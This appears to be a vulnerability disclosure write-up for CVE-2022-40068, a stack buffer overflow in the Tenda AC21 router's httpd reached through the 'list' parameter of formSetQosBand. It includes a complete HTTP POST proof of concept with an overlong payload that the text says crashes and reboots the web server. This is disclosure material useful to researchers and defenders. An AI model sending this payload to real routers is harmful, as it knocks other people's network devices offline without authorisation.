Headline
CVE-2022-40068: Vuln/Tenda AC21/10 at main · xxy1126/Vuln
Tenda AC21 V16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, function: formSetQosBand.
Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview
- Manufacturer’s website information:https://www.tenda.com.cn/
- Firmware download address: https://www.tenda.com.cn/download/detail-3419.html
product information
Tenda A21(V16.03.08.15), latest version of simulation overview:
description****1. Vulnerability Details
Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionformSetQosBand
Attackers can cause this vulnerability via parameter list
In function formSetQosBand, it calls set_qosMib_list and pass v2 to it.
In function set_qosMib_list, it calls strcpy(v8, s), v8 is on the stack, so there is a buffer overflow vulnerability.
2. Recurring loopholes and POC
In order to reproduce the vulnerability, the following steps can be followed:
Boot the firmware by qemu-system or other ways (real machine)
Attack with the following POC attacks
POST /goform/SetNetControlList HTTP/1.1 Host: 192.168.0.1 Content-Length: 879 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.0.1 Referer: http://192.168.0.1/system_time.html?random=0.08852963756997312& Accept-Encoding: gzip, deflate Accept-Language: en,zh-CN;q=0.9,zh;q=0.8 Cookie: password=25d55ad283aa400af464c76d713c07aduufcvb Connection: close
list=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
By sending this poc, we can makehttpd reboot